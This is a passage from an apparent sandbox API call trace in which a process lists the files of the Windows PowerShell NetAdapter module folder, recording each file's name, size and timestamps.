lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0177.251] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\", lpFilePart=0x0) returned 0x3e [0177.251] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.252] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.252] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ffb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.252] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapter.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.253] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3925, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.253] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e57, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterAdvancedProperty.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.253] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x260e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.253] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterBinding.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.253] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2fb2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.cdxml", cAlternateFileName="")) returned 1 [0177.253] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterChecksumOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.254] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2418, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.cdxml", cAlternateFileName="")) returned 1 [0177.254] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterEncapsulatedPacketTaskOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.254] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.254] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterHardwareInfo.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.254] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x245a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.cdxml", cAlternateFileName="")) returned 1 [0177.254] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x15fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterIPsecOffload.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.254] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2432, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.cdxml", cAlternateFileName="")) returned 1 [0177.255] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1748, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterLso.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.255] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e61, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.cdxml", cAlternateFileName="")) returned 1 [0177.255] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c25, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPacketDirect.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.255] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4100, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.255] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcea, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.255] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e50, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterPowerManagement.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.255] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2005, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.cdxml", cAlternateFileName="")) returned 1 [0177.256] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x148f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0177.256] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.256] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.cdxml", cAlternateFileName="")) returned 1 [0177.256] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRdma.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.256] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c691a7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c691a7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a70, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.cdxml", cAlternateFileName="")) returned 1 [0177.256] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRsc.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.256] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x27d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.257] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1808, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterRss.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.257] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2701, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.cdxml", cAlternateFileName="")) returned 1 [0177.257] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe42, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriov.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.257] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.257] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterSriovVf.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.258] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.258] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterStatistics.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.258] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2319, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.258] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmq.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.258] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.259] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb565c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10cb565c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10cb565c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe06, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVmqQueue.Format.ps1xml", cAlternateFileName="")) returned 1 [0177.259] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c8f401, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10c8f401, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10c8f401, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9df, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.cmdletDefinition.cdxml", cAlternateFileName="")) returned 1 [0177.259] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e0, dwReserved0=0x0, 